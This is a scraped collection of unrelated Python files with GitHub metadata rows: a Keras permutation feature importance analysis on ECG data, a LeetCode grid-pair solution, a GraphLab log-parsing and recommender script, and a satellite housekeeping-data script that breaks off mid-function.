# Combine everything again:
X = np.concatenate((X_train, X_test), axis = 0)
Y = np.concatenate((y_train, y_test), axis = 0)
# One-hot encoding of Y:
Y = to_categorical(Y)
# Build the multilayer perceptron
# Build the MLP model
def getModel():
model_mlp = Sequential()
model_mlp.add(Dense(100, activation = 'relu'))
model_mlp.add(Dense(9, activation = 'softmax'))
return model_mlp
# Instantiate and build the model before printing the summary
model_mlp = getModel()
model_mlp.build(input_shape=(None, X.shape[1]))
model_mlp.summary()
# Implement and apply PFI for the multilayer perceptron
# Perturbation methods:
# There are different kinds of perturbation for permutation feature importance, such as mean perturbation, zero perturbation and random perturbation. In the implementation in this notebook, the data within each slice are shuffled at random.
fig, ax = plt.subplots(1, 4, figsize = (20, 4), sharex = True, sharey=True)
# No perturbation: original signal.
ax[0].set_title('No perturbation')
ax[0].plot(np.arange(len( X[20, :])), X[20, :])
# Zero perturbation: the values of each slice are set to 0.
ax[1].set_title('Zero perturbation')
X_zero_perturbed = X[20, :].copy()
X_zero_perturbed[5 * 25 : 6 * 25] = 0.0
ax[1].plot(np.arange(len(X[20, :])), X_zero_perturbed)
# Random perturbation: the values of each slice are replaced with random values.
ax[2].set_title('Random perturbation')
X_random_perturbed = X[20, :].copy()
X_random_perturbed[5 * 25 : 6 * 25] = np.std(X[20, :]) * np.random.randn(25) + np.mean(X[20, :])
ax[2].plot(np.arange(len(X[20, :])), X_random_perturbed)
# Mean perturbation: the values of the current slice are averaged.
ax[3].set_title('Mean perturbation')
X_mean_perturbed = X[20, :].copy()
X_mean_perturbed[5 * 25 : 6 * 25] = np.mean(X[20, 5 * 25 : 6 * 25])
ax[3].plot(np.arange(len(X[20, :])), X_mean_perturbed)
for i in range(4):
ax[i].set_xlabel('Time')
ax[i].axvspan(5 * 25, 6 * 25, color = 'green', alpha = 0.25)
# Permutation feature importance:
kf = StratifiedKFold(n_splits = 5, shuffle = True)
contador_pliegues = 0
M = np.zeros((X.shape[0], 11))
for indice_train, indice_test in kf.split(X, np.argmax(Y, axis = 1)):
print('Fold ', contador_pliegues)
# Split the data in each fold:
X_train, X_test = X[indice_train], X[indice_test]
y_train, y_test = Y[indice_train], Y[indice_test]
# Build the learning model with the training data:
model_mlp = getModel()
model_mlp.compile(optimizer = 'adam', loss = tf.keras.losses.CategoricalCrossentropy())
model_mlp.fit(X_train, y_train, epochs = 100, verbose = 0)
# Make predictions on the test data without permutations:
predicciones = model_mlp.predict(X_test)
# For each feature:
for corte in range(0, 275, 25):
# Permute and make predictions:
x_permutacion = np.copy(X_test)
x_corte = X_test[:, corte:corte+25]
x_corte_permutacion = np.random.permutation(x_corte)
x_permutacion[:, corte:corte + 25] = x_corte_permutacion
pred_perm = model_mlp.predict(x_permutacion)
# Compute the importance:
importancia = ((np.argmax(y_test, axis = 1) - np.argmax(pred_perm, axis = 1))**2
- (np.argmax(y_test, axis = 1) - np.argmax(predicciones, axis = 1))**2)
M[indice_test, corte // 25] = importancia
contador_pliegues += 1
importancia_media = np.mean(M, axis = 0)
indices_ordenados = np.argsort(-1 * importancia_media)
cortes = np.arange(1, 12)
colores = ['forestgreen', 'limegreen', 'royalblue', 'blue', 'darkorange', 'cyan', 'purple', 'red', 'pink', 'yellow', 'coral']
fig, ax = plt.subplots(1, 2, figsize = (15, 4))
ax[0].bar(range(11), importancia_media[indices_ordenados], color = np.array(colores)[indices_ordenados])
ax[0].set_title('Importance of each feature of the MLP model')
ax[0].set_xticks(np.arange(11))
ax[0].set_xticklabels(cortes[indices_ordenados].astype(int))
ax[0].set_xlabel('Slice')
ax[0].set_ylabel('Importance of each feature')
ecg_normalizado = (X[20, :] - X[20, :].min()) / (X[20, :].max() - X[20, :].min())
Importancia_caraceristica_normalizada = (importancia_media - importancia_media.min()) / (importancia_media.max() - importancia_media.min())
ax[1].plot(np.arange(len(ecg_normalizado)), ecg_normalizado, label='ECG data')
ax[1].plot(np.repeat(Importancia_caraceristica_normalizada, 25), label = 'Importance of each feature')
ax[1].set_title('Importance of each feature \nfor the MLP model on an ECG sample')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('ECG signal / Importance of each feature')
ax[1].legend()
|
Nestructor/Codigo_TFM_Aplicacion-del-Aprendizaje-Profundo-en-la-toma-de-Decisiones-Clinicas-Informadas
|
PFI.py
|
PFI.py
|
py
| 6,333
|
python
|
es
|
code
| 0
|
github-code
|
6
|
36774550355
|
from collections import defaultdict
class Solution(object):
def equalPairs(self, grid):
"""
:type grid: List[List[int]]
:rtype: int
"""
dic = defaultdict(int)
no_pair = 0
rows = len(grid)
cols = len(grid[0])
for i in range(rows):
dic[tuple(grid[i])] += 1
for j in range(cols):
temp_tupel = tuple([row[j] for row in grid])
no_pair += dic[temp_tupel]
return no_pair
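# Minimal usage sketch (grid chosen as an example, not taken from the problem statement):
# Solution().equalPairs([[3, 2, 1], [1, 7, 6], [2, 7, 7]])  ->  1   (row [2,7,7] matches column index 1)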
|
nathy-min/Competitive-Programming
|
2352-equal-row-and-column-pairs/2352-equal-row-and-column-pairs.py
|
2352-equal-row-and-column-pairs.py
|
py
| 494
|
python
|
en
|
code
| 2
|
github-code
|
6
|
43216118551
|
import graphlab as gl
import urlparse
settings = {'client_log': 's3://dato-demo-metrics/client-logs',
'server_log_old': 's3://gl-testing-chris/log/strata-predictive-service-three_logs',
'server_log_old2': 's3://dato-stratanow/logs/stratanow_logs',
'server_log': 's3://dato-stratanow/log/strata-now_logs'}
def process_client(settings):
# Process client logs
client_logs = gl.SFrame.read_csv(settings['client_log'] + '/*.gz',
comment_char='#', delimiter='\t', header=False)
def parse_query_string(x):
return {k : v[0] for (k,v) in urlparse.parse_qs(x).iteritems()}
client_logs['params'] = client_logs['X12'].apply(lambda x: parse_query_string(x))
client_logs = client_logs.unpack('params')
client = client_logs[[c for c in client_logs.column_names() if c.startswith('params.se')]]
colnames = {k: k.replace('params.se_','') for k in client.column_names()}
#duid = user id
client = client.rename(colnames)
client['user'] = client_logs['params.duid']
client['date'] = client_logs['X1']
client['time'] = client_logs['X2']
client = client.rename({'pr': 'uuid',
'ac': 'event_type',
'la': 'item_id'})
return client
def process_server(settings):
server_logs = gl.SFrame.read_csv(settings['server_log'] + '/*custom.log', header=False)
return server_logs.unpack('X2', column_name_prefix='')\
.unpack('data', column_name_prefix='')
clientlogs = process_client(settings)
clientlogs.tail()
serverlogs = process_server(settings)
serverlogs.tail()
historical = serverlogs.join(clientlogs, on='uuid')
c = clientlogs[clientlogs['event_type']=='like']
c = c.rename({'user':'user_id'})
c = c.groupby(['user_id', 'item_id'], {})
train,test=gl.recommender.util.random_split_by_user(c)
m = gl.recommender.create(train)
m.evaluate(test)
|
turi-code/Strata-Now
|
data/metrics.py
|
metrics.py
|
py
| 1,912
|
python
|
en
|
code
| 4
|
github-code
|
6
|
42440314481
|
import plotly.express as px
import plotly.graph_objs as go
import pandas as pd
from sklearn.decomposition import PCA
import numpy as np
#****************** Retrieving the CSV data ************************#
df = pd.read_csv("https://simplonline-v3-prod.s3.eu-west-3.amazonaws.com/media/file/csv/be67fa74-2c34-419c-9249-050394a7eb3e.csv")
# df2016 = df[df.year == 2016].iloc[:50,:]
# df2016['world_rank'] = df2016['world_rank'].replace(['=39'],'39')
# df2016['world_rank'] = df2016['world_rank'].replace(['=44'],'44')
# df2016['world_rank'] = df2016['world_rank'].replace(['=47'],'47')
# df2016["num_students"] = [str(each).replace(',', '') for each in df2016["num_students"]]
df2016 = df[df.year == 2016].iloc[:58,:] # 8 lines contain "NaN"
df2016
df2016 = df2016.dropna()
df2016.isnull().sum()
print(len(df2016))
df2016
def convertGender (x):
a, b= x.split(':')
c = format(int(a)/int(b), ".2f")
return c
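# Worked example (the "a : b" ratio format below is an assumption about the dataset values):
# convertGender('33 : 67')  ->  '0.49'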
df2016['female_male_ratio'] = df2016['female_male_ratio'].apply(convertGender)
df2016.world_rank = [int(each.replace('=','')) for each in df2016.world_rank]
df2016['international_students'] = df2016['international_students'].str.replace(r'%', r'.0').astype('float') / 100.0
df2016['num_students'] = df2016['num_students'].str.replace(r',', r'.').astype('float')
df2016['income'] = df2016['income'].astype('float')
df2016['international'] = df2016['international'].astype('float')
df2016['total_score'] = df2016['total_score'].astype('float')
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
# number of observations
n = df_2016.shape[0]
# number of variables
p = df_2016.shape[1]
# figure1
fig1 = px.scatter(df2016, x="country", y="world_rank", color="country")
fig1.update_layout(clickmode='event+select')
fig1.update_traces(marker_size=20)
# figure2
trace1 = go.Scatter( x = df2016.world_rank,y = df2016.citations,
mode = "lines", name = "citations",marker = dict(color = 'rgba(16, 112, 2, 0.8)'),text = df.university_name)
trace2 = go.Scatter( x = df2016.world_rank,y = df2016.teaching,
mode = "lines+markers",name = "teaching",marker = dict(color = 'rgba(80, 26, 80, 0.8)'),text = df.university_name)
data = [trace1, trace2]
layout = dict(title = 'Citations and teaching compared with the world ranking of the top 50 universities in 2016',
xaxis = dict(title = 'World rank',ticklen = 5,zeroline= False))
fig2 = dict(data = data, layout = layout)
# figure3
fig3 = px.scatter(df2016, x="num_students", y="citations",color="country")
fig3.update_layout(clickmode='event+select')
fig3.update_traces(marker_size=20)
# figure4
fig4 = px.scatter(df2016, x="world_rank", y="citations",color="country")
fig4.update_layout(clickmode='event+select')
fig4.update_traces(marker_size=20)
############### Figures for page 2 ######################
# PCA
#1- FIRST-FIG
df_2016 = df2016.drop(['year', 'university_name','country'], axis=1)
#features = ["sepal_width", "sepal_length", "petal_width", "petal_length"]
features = ['world_rank','teaching','research','citations',]
fig5 = px.scatter_matrix(
df_2016,
dimensions=features,
#color="species"
)
fig5.update_traces(diagonal_visible=False)
# 2- PCA-FIG
pca = PCA(n_components=4)
components = pca.fit_transform(df_2016)
labels = {
str(i): f"PC {i+1} ({var:.1f}%)"
for i, var in enumerate(pca.explained_variance_ratio_ * 100)
}
fig6 = px.scatter_matrix(
components,
labels=labels,
dimensions=range(4),
)
fig6.update_traces(diagonal_visible=False)
# 3- cumsum pca.explained variance
pca2 = PCA()
pca2.fit(df_2016)
val_prop = ((n-1)/n*pca2.explained_variance_)/100
exp_var_cumul = np.cumsum(pca2.explained_variance_ratio_)
fig7 = px.area(
x=range(1, exp_var_cumul.shape[0] + 1),
y=exp_var_cumul,
labels={"x": "# Components", "y": "cumul_variance"}
)
fig8 = px.area(
x=range(1, val_prop.shape[0] + 1),
y=val_prop,
labels={"x": "# Components", "y": "variance"}
)
|
AbdiNi/Plotly-Dash
|
Dash_Plotly/My_dataset.py
|
My_dataset.py
|
py
| 4,007
|
python
|
en
|
code
| 0
|
github-code
|
6
|
29059896663
|
import imageio
import torch
import torch.nn.functional as F
import numpy as np
import os, argparse
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
from net.bgnet import Net
from utils.tdataloader import test_dataset
parser = argparse.ArgumentParser()
parser.add_argument('--testsize', type=int, default=416, help='testing size')
parser.add_argument('--pth_path', type=str, default='./checkpoints/best/BGNet.pth')
for _data_name in ['CAMO','CHAMELEON','COD10K','NC4K']:
data_path = './data/TestDataset/{}/'.format(_data_name)
save_path = './results/BGNet/{}/'.format(_data_name)
opt = parser.parse_args()
model = Net()
model.load_state_dict(torch.load(opt.pth_path))
model.cuda()
model.eval()
os.makedirs(save_path, exist_ok=True)
os.makedirs(save_path+'edge/', exist_ok=True)
image_root = '{}/Imgs/'.format(data_path)
gt_root = '{}/GT/'.format(data_path)
test_loader = test_dataset(image_root, gt_root, opt.testsize)
for i in range(test_loader.size):
image, gt, name = test_loader.load_data()
gt = np.asarray(gt, np.float32)
gt /= (gt.max() + 1e-8)
image = image.cuda()
_, _, res, e = model(image)
res = F.upsample(res, size=gt.shape, mode='bilinear', align_corners=False)
res = res.sigmoid().data.cpu().numpy().squeeze()
res = (res - res.min()) / (res.max() - res.min() + 1e-8)
imageio.imwrite(save_path+name, (res*255).astype(np.uint8))
# e = F.upsample(e, size=gt.shape, mode='bilinear', align_corners=True)
# e = e.data.cpu().numpy().squeeze()
# e = (e - e.min()) / (e.max() - e.min() + 1e-8)
# imageio.imwrite(save_path+'edge/'+name, (e*255).astype(np.uint8))
|
thograce/BGNet
|
etest.py
|
etest.py
|
py
| 1,718
|
python
|
en
|
code
| 57
|
github-code
|
6
|
38049723382
|
import sys
import os
import yaml
import json
CUSTOM_WORD_LIST_FILENAME = '.wordlist.txt'
def find_wordlist_files(path):
wordlist_paths = []
for root, dirs, files in os.walk(path):
for file in files:
if file.endswith(CUSTOM_WORD_LIST_FILENAME):
wordlist_paths.append(os.path.join(root, file))
return wordlist_paths
if __name__ == '__main__':
spell_check_yaml_path = sys.argv[1]
markdown_base_path = sys.argv[2]
spell_check_yaml = None
with open(spell_check_yaml_path, 'r') as read_file:
spell_check_yaml = yaml.load(read_file, Loader=yaml.FullLoader)
wordlist_paths = find_wordlist_files(markdown_base_path)
print("Adding wordlists: ")
print("\n".join(wordlist_paths))
spell_check_yaml['matrix'][0]['dictionary']['wordlists'].extend(wordlist_paths)
with open(spell_check_yaml_path + ".tmp", 'w') as write_file:
#yaml.dump doesn't work here under Python 3, so we dump to JSON instead & convert using yq in the outer script
#yaml.dump(write_file, spell_check_yaml, Dumper=yaml.Dumper)
json.dump(spell_check_yaml, write_file, indent=4)
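# Usage sketch (the file paths below are assumptions, not taken from the repository):
# python generate-spellcheck.py .spellcheck.yml docs/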
|
actions-marketplace-validations/jordanbean-msft_wth-spell-check-action
|
generate-spellcheck.py
|
generate-spellcheck.py
|
py
| 1,153
|
python
|
en
|
code
| 0
|
github-code
|
6
|
3962586718
|
import sys
import os
import random
import matplotlib.pyplot as plt
from typing import List
BASE_FILENAME="develop"
OUTPUT_TYPE="png"
def create_pie_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
explode = []
biggest_value = 0
biggest_iterator = 0
for i, _ in enumerate(keywords):
random_value = random.randint(10, 100)
data.append(random_value)
explode.append(0)
if random_value >= biggest_value:
biggest_iterator = i
biggest_value = random_value
explode[biggest_iterator] = 0.1
fig1, ax1 = plt.subplots()
ax1.set_xlabel("Distribution of value")
ax1.pie(data, explode=explode, labels=keywords, autopct='%1.1f%%',
shadow=True, startangle=90)
ax1.axis('equal') # Equal aspect ratio ensures that pie is drawn as a circle.
plt.savefig(f"outputs/{base_filename}_pie.{output_type}")
def create_bar_chart(keywords: List[str], base_filename: str, output_type: str):
data = []
for _ in keywords:
data.append(random.randint(5, 40))
plt.xlabel('Option')
plt.ylabel('Annual savings in percent')
plt.bar(keywords, data)
plt.savefig(f"outputs/{base_filename}_bar.{output_type}")
def main():
keywords = []
for i, element in enumerate(sys.argv):
if i == 0:
continue
keywords.append(element)
print(f"Your important {len(keywords)} keywords are: {keywords}")
create_bar_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
create_pie_chart(keywords, BASE_FILENAME, OUTPUT_TYPE)
print("Your important graphs were created")
if __name__=="__main__":
main()
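# Usage sketch (keywords are arbitrary examples): python bullshitgraphs.py Synergy Cloud AI
# Writes outputs/develop_bar.png and outputs/develop_pie.png (the outputs/ folder must already exist).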
|
neilschark/bullshitgraphs
|
bullshitgraphs/bullshitgraphs.py
|
bullshitgraphs.py
|
py
| 1,675
|
python
|
en
|
code
| 1
|
github-code
|
6
|
962892446
|
from tkinter import *
from tkinter.messagebox import showinfo
import pandas as pd
import numpy as np
import sklearn as sk
from sklearn.linear_model import LinearRegression
import matplotlib.pyplot as plt
# function call
def cal():
data = pd.read_csv("2a.csv")
if (var1.get()=='123'):
showinfo("Invalid input", "please select a state")
df = pd.DataFrame(data,
columns=['SUBDIVISION', 'YEAR', 'JAN', 'FEB', 'MAR', 'APR', 'MAY', 'JUN', 'JUL', 'AUG', 'SEP',
'OCT', 'NOV', 'DEC'])
data= df.loc[df['SUBDIVISION'] == var1.get()]
x = data['YEAR']
x = x.values.reshape(-1, 1)
# x=x.drop(['Unnamed: 0'],axis=1)
if (var.get()=='123'):
showinfo("Invalid input", "please select a month")
y = data[var.get()]
y = y.values.reshape(-1, 1)
clf = LinearRegression()
clf.fit(x, y)
v = int(Year.get())
if (v<=0 or v>10000 ):
showinfo("Invalid input", "please use a valid year")
inp = np.array(v)
inp = inp.reshape(1, -1)
# Print output
showinfo("output",f"The precipitation in inches for the input is:,{clf.predict(inp)}")
# year_index = 100
# year = [i for i in range(v-50,v+50)]
plt.scatter(x, y, color='g',marker= ".")
plt.scatter(v, clf.predict(inp), color='b',label=f"Predicted value {clf.predict(inp)} in {Year.get()}",marker= "*")
v=max(v,2015)
x1=[1901,v]
y1=[clf.predict([[1901]])[0][0],clf.predict([[v]])[0][0]]
plt.plot(x1,y1,color='r',label=f"linear prediction from 1901 to {v} ")
plt.title('Precipitation level')
plt.xlabel('Year')
plt.ylabel(f"Precipitation for {var.get()}")
plt.legend()
# Plot a graph of precipitation levels vs n# of days
plt.show()
#GUI
root=Tk()
root.geometry("600x600")
# root.title("rainfall prediction")
Label(root, text="Enter year and choose any one of these",font="any 15 underline",fg="#f58d25").grid(row=0,column=3,ipady=10)
Label(root, text=" Year =",font="any 13 bold",foreground="#853535").grid(row=1,column=1)
Year=Entry(root,justify=LEFT,bg="#cafad2",font="any 12 bold",fg="red")
Year.grid(row=1,column=2,ipady=5,pady=17,ipadx=15)
var=StringVar()
var.set("123")
Radiobutton(root,text="Jan",variable=var, value="JAN",font="any 12",foreground="blue").grid(row=3,column=2)
Radiobutton(root,text="Feb",variable=var, value="FEB",font="any 12",foreground="blue").grid(row=4,column=2)
Radiobutton(root,text="Mar",variable=var, value="MAR",font="any 12",foreground="blue").grid(row=5,column=2)
Radiobutton(root,text="Apr",variable=var, value="APR",font="any 12",foreground="blue").grid(row=6,column=2)
Radiobutton(root,text="May",variable=var, value="MAY",font="any 12",foreground="blue").grid(row=7,column=2)
Radiobutton(root,text="Jun",variable=var, value="JUN",font="any 12",foreground="blue").grid(row=8,column=2)
obj=['ANDAMAN & NICOBAR ISLANDS', 'ARUNACHAL PRADESH', 'ASSAM & MEGHALAYA', 'NAGA MANI MIZO TRIPURA', 'GANGETIC WEST BENGAL', 'ORISSA', 'JHARKHAND', 'BIHAR', 'EAST UTTAR PRADESH', 'WEST UTTAR PRADESH', 'UTTARAKHAND', 'HARYANA DELHI & CHANDIGARH', 'PUNJAB', 'HIMACHAL PRADESH', 'JAMMU & KASHMIR', 'WEST RAJASTHAN' , 'EAST RAJASTHAN', 'WEST MADHYA PRADESH', 'EAST MADHYA PRADESH', 'GUJARAT REGION', 'SAURASHTRA & KUTCH', 'KONKAN & GOA', 'MADHYA MAHARASHTRA', 'MATATHWADA', 'VIDARBHA', 'CHHATTISGARH', 'COASTAL ANDHRA PRADESH', 'TELANGANA', 'RAYALSEEMA', 'TAMIL NADU', 'COASTAL KARNATAKA', 'NORTH INTERIOR KARNATAKA', 'SOUTH INTERIOR KARNATAKA', 'KERALA', 'LAKSHADWEEP',]
var1=StringVar()
var1.set('ANDAMAN & NICOBAR ISLANDS')
OptionMenu(root,var1,*obj).grid(row=9,column=2)
Label(root, text=" Select -> :)",font="any 13 bold",foreground="#853535").grid(row=9,column=1)
Button(text="Calculate Now", command=cal, activebackground = "yellow",border=5).grid(row=11,column=2,pady=20,ipadx=25)
root.mainloop()
|
Santonu-Naskar/Rainfall-Prediction
|
rainfall/main/main1.py
|
main1.py
|
py
| 3,959
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73652302269
|
# Write a function that takes an unsigned integer (given as a binary string) and returns the number of '1' bits in its binary representation (also known as the Hamming weight).
class Solution(object):
def hammingWeight(self, n):
"""
:type n: int
:rtype: int
"""
ret = 0
while n:
n &= n - 1
ret += 1
return ret
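# Minimal usage sketch (value chosen as an example):
# Solution().hammingWeight(11)  ->  3   (11 is 0b1011)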
|
xxxxlc/leetcode
|
Bit/hammingWeight.py
|
hammingWeight.py
|
py
| 397
|
python
|
zh
|
code
| 0
|
github-code
|
6
|
27137014730
|
#Programmer Sadiq
#By@Sadiqul Islam
#Use of sum() function
#sum() function
#Syntax of sum() function : sum(iterable,start)
#If you want to add all the elements of a list, you can use it
#Example 1
list1 = list(range(0,11)) #list
app = sum(list1,0) #use of sum() function
print(app) #add element of list
#Example 2
numbers = [2.5,3,4,-5]
sum1 = sum(numbers) #start parameter is not provided
print(sum1)
sum2 = sum(numbers,10) #use of start parameter
print(sum2)
|
swesadiqul/python-list
|
sum() function.py
|
sum() function.py
|
py
| 470
|
python
|
en
|
code
| 0
|
github-code
|
6
|
2053821942
|
from config import dogs_and_cats_config as config
from pyimagesearch.preprocessing import ImageToArrayPreprocessor, MeanPreprocessor, CropPreprocessor
from pyimagesearch.io import HDF5DatasetGenerator
from keras.models import load_model
import progressbar
import json
import numpy as np
import cv2
import argparse
import pandas as pd
# construct argument parser and parse the argument
ap = argparse.ArgumentParser()
ap.add_argument('-s', '--submit', required=True, help='path to submission file')
args = vars(ap.parse_args())
# load RGB means from json
means = json.loads(open(config.DATASET_MEAN).read())
# initialize image preprocessors
mp, cp, iap = MeanPreprocessor(means['R'], means['G'], means['B']), CropPreprocessor(227, 227), ImageToArrayPreprocessor()
# load model
print('[INFO] loading model...')
model = load_model(config.MODEL_PATH)
# initialize dataset generator
test_gen = HDF5DatasetGenerator(config.PUBLIC_TEST_HDF5, batch_size=64, preprocessors=[mp])
preds = []
# initialize progressbar
widgets = ['Evaluating: ', progressbar.Percentage(), ' ', progressbar.Bar(), ' ', progressbar.ETA()]
pbar = progressbar.ProgressBar(maxval=test_gen.num_images//64, widgets=widgets)
# loop over single pass of test data
for i, (images, labels) in enumerate(test_gen.generator(passes=1)):
# loop over individual images
for image in images:
# apply crop preprocessor
crops = cp.preprocess(image)
crops = np.array([iap.preprocess(crop) for crop in crops], dtype='float32')
# predict on the crops
pred = model.predict(crops)
preds.append(pred.mean(axis=0))
pbar.update(i)
pbar.finish()
# build submission dataframe
df = pd.DataFrame({
'id': np.array(range(1, test_gen.num_images+1)),
'label': np.array(preds).argmax(axis=1)
})
df.to_csv(args['submit'])
# close database
test_gen.close()
|
lykhahaha/Mine
|
PractitionerBundle/chapter10-dogs_vs_cats/crop_accuracy_public_test.py
|
crop_accuracy_public_test.py
|
py
| 1,859
|
python
|
en
|
code
| 0
|
github-code
|
6
|
30192351629
|
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.datasets import load_iris
iris = load_iris()
X = iris.data
y = iris.target
def sigmoid(inX):# define the sigmoid function
return 1.0/(1+np.exp(-inX))
def std_data(X):
means = X.mean(axis=0) # mean
stds = X.std(axis=0) # standard deviation
A=X.shape[0] # number of samples
B= X.shape[1] + 1 # parameter dimension
X_std = np.ones((A, B))
X_std[:, 1:] = (X - means) / stds
return X_std
def predict(Pw): # pick the predicted class for each sample
y_pred=[]
for p in Pw:
P=list(p)
y_pred.append(P.index(max(P)))
return y_pred
def gradAscent(X_train,y_train,K_num):# solve by gradient descent
loss=[]
ks = list(set(y_train))
N=X_train.shape[0] # N: number of samples
M = X_train.shape[1] + 1 # M: dimension of the parameter vector
data = std_data(X_train)
Weight = np.zeros((K_num - 1, M)) # matrix storing the parameters
temp=[1.0 / N * np.sum(data[y_train == ks[i]], axis=0) for i in range(K_num - 1)]
priEs = np.array(temp) # expected values
for i in range(1000):
wx = np.exp(np.dot(Weight, data.transpose()))
probs = np.divide(wx, 1 + np.sum(wx, axis=0).transpose())
pEs = 1.0 / N * np.dot(probs, data)
loss.append(np.sum(pEs-priEs))
gradient = pEs - priEs + 1.0 /100 * Weight # gradient
Weight = Weight - gradient # update the parameters
plt.figure()
x=[i for i in range(1000)]
plt.plot(x,loss)
plt.title('loss line')
plt.xlabel('number')
plt.ylabel('loss')
plt.show()
return Weight
def LogisticRegression(Weight,K,X_test):
N1= X_test.shape[0]
data=std_data(X_test)
prob = np.ones((N1,K))
prob[:,:-1] = np.exp(np.dot(data,Weight.transpose()))
prob =prob/ np.array([np.sum(prob,axis = 1)]).transpose() # probabilities
return prob
def main():
split_list = [0.1, 0.3, 0.5]# load the data
for i in split_list:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=i)
K_num = np.shape(list(set(y_train)))[0]
W = gradAscent(X_train, y_train, K_num)
prob = LogisticRegression(W, K_num, X_test)
y_pre = predict(prob)
print("ๆต่ฏ้:{} ๅ็กฎ็:{}".format(i, accuracy_score(y_pre, y_test)))
if __name__ == "__main__":
main()
|
TJPU-ML/Homework-for-the-fall-semester-of-2018
|
iris classification/็็็/lris.py
|
lris.py
|
py
| 2,416
|
python
|
en
|
code
| 0
|
github-code
|
6
|
30950837477
|
def D0(fp):
Dt = 1
taur = 1./(3*Dt)
return fp**2*taur/2.
def rms(fp,ts):
Dt = 1
taur = 1./(3*Dt)
d = 2
tts = ts*1e-5
return 4*Dt*tts+fp**2*taur**2/(d*(d-1))*(2*d*tts/taur+np.exp(-2*d*tts/taur)-1)
def swim(fp,rho):
Dt = 1
taur = 1./(3*Dt)
return rho*fp*fp*taur/2.0
if __name__=="__main__":
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append('../../plotting_scripts')
from jupyterplots import JupyterPlots
sys.path.append('../../analysis_scripts')
from logloader import LogLoader
figsize = JupyterPlots()
prefix1 = 'data2/'
tcut = -1
fps = np.array([1,5,10,20,40,60,80,100],int)
# density (in lj units)
rho = '0.7'
fig,axarr = plt.subplots(2,sharex=True,figsize=[figsize[0],figsize[0]*2])
fp = 100
fname = f'pressure_{fp}_{rho}'
ll = LogLoader(prefix1 + f'log_{fp}_{rho}.lammps.log')
ts = ll.data['Step']
RMSs = ll.data['c_mymsdd[4]']
Ps = ll.data['c_press']
Ds = ll.data['v_Diff']
#data = np.loadtxt(prefix1 + fname + '.txt.fixprint')
#ts = data[:,0]
#Ts = data[:,1]
#Ds = data[:,2]
#Ps = data[:,3]
#tcut = 200000
print(ts)
#axarr[0].plot(ts[1:],np.gradient(RMSs,ts)[1:]/4e-5,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,RMSs,'o',label=rf'$f_p={fp}$')
axarr[0].plot(ts,rms(fp,ts),'k-')
#axarr[0].plot(ts,D0(fp)+0*ts,'k-')
#axarr[0].plot(ts[1:],Ds[1:],'.',label=rf'$f_p={fp}$')
axarr[1].plot(ts,Ps,'o',label=rf'$f_p={fp}$')
axarr[1].plot(ts,swim(fp,float(rho))+ts*0,'k-',label=rf'$f_p={fp}$')
axarr[0].set_ylabel(r'$<R^2>$')
axarr[1].set_ylabel(r'$P_{eff}$')
axarr[1].set_xlabel(r'$t$')
fig.savefig('results_single_pressure/' + fname + '.pdf')
plt.show()
|
samueljmcameron/ABPs_coarse_graining
|
experiments/2020_03_31/no_interactions_pressure/single_pressure.py
|
single_pressure.py
|
py
| 1,818
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73279162747
|
import numpy as np
import matplotlib.pyplot as plt
# system variables
fs = 100e3
f = 1e3
phi = np.pi/4
N = int(4*fs/f)
n_var = 0.01
# create some empty vectors to fill
x = np.zeros(N, dtype=complex)
n_a = np.zeros(N, dtype=complex)
e = np.zeros(N)
w = np.zeros(N)
y = np.zeros(N, dtype=complex)
y_ = np.zeros(N, dtype=complex)
w_ = np.zeros(N)
# loop through performing esitmation
for n in range(int(N)):
# create reference signal
x[n] = np.exp(1j*(2*n*np.pi*f/fs + phi))
# create noise to get received signal
n_a[n] = float(np.random.normal(0, np.sqrt(n_var), 1)) + 1j*float(np.random.normal(0, np.sqrt(n_var), 1))
y[n] = x[n] + n_a[n]
# create the estimated signal
y_[n] = np.exp(1j*sum(w_))
# create the error signal
e[n] = y[n] * y_[n]
# create new frequency estimate
w_[n] = e[n]
# plot the results
plt.plot(np.real(x))
plt.plot(np.imag(y_))
plt.title("Maximum Likelihood Phase Estimation")
plt.xlabel("samples")
plt.ylabel("amplitude")
plt.show()
|
yrrapt/ada-comms
|
sinusoid_estimate_noise.py
|
sinusoid_estimate_noise.py
|
py
| 1,012
|
python
|
en
|
code
| 0
|
github-code
|
6
|
12242514248
|
#!/usr/bin/env python
from rootpy import ROOT
from rootpy.io import File
from rootpy.tree import Tree
from collections import deque
def find_maintenance(filename):
aux_file = File(filename, 'read')
aux_tree = aux_file.get('t_hk_obox')
maintenance_start = False
maintenance_list = []
gps_time_list = []
ship_time_list = []
for entry in aux_tree:
if entry.obox_is_bad > 0: continue
if entry.obox_mode.encode('hex') == '04':
if not maintenance_start:
maintenance_start = True
gps_time_list.append(entry.abs_gps_week * 604800 + entry.abs_gps_second)
ship_time_list.append(entry.abs_ship_second)
else:
if maintenance_start:
maintenance_start = False
maintenance_list.append(((ship_time_list[0] + ship_time_list[-1]) / 2, (gps_time_list[0] + gps_time_list[-1]) / 2))
gps_time_list = []
ship_time_list = []
return [(int(x[0]), "%d:%d" % (int(x[1] / 604800), int(x[1] % 604800))) for x in maintenance_list]
def find_orbitstart(filename):
LAT_LEN = 500
lat_deque = deque()
orbitstart_list = []
ppd_file = File(filename, 'read')
ppd_tree = ppd_file.get('t_ppd')
ready_flag = True
pre_diff = 0.0
cur_diff = 0.0
for entry in ppd_tree:
if entry.flag_of_pos != 0x55: continue
lat_deque.append((entry.latitude, entry.ship_time_sec, entry.utc_time_sec))
if len(lat_deque) < LAT_LEN:
pre_diff = lat_deque[-1][0] - lat_deque[0][0]
continue
else:
lat_deque.popleft()
cur_diff = lat_deque[-1][0] - lat_deque[0][0]
if ready_flag and pre_diff < 0 and cur_diff >= 0:
orbitstart_list.append(((lat_deque[-1][1] + lat_deque[0][1]) / 2, (lat_deque[-1][2] + lat_deque[0][2]) / 2))
ready_flag = False
if not ready_flag and pre_diff > 0 and cur_diff <= 0:
ready_flag = True
pre_diff = cur_diff
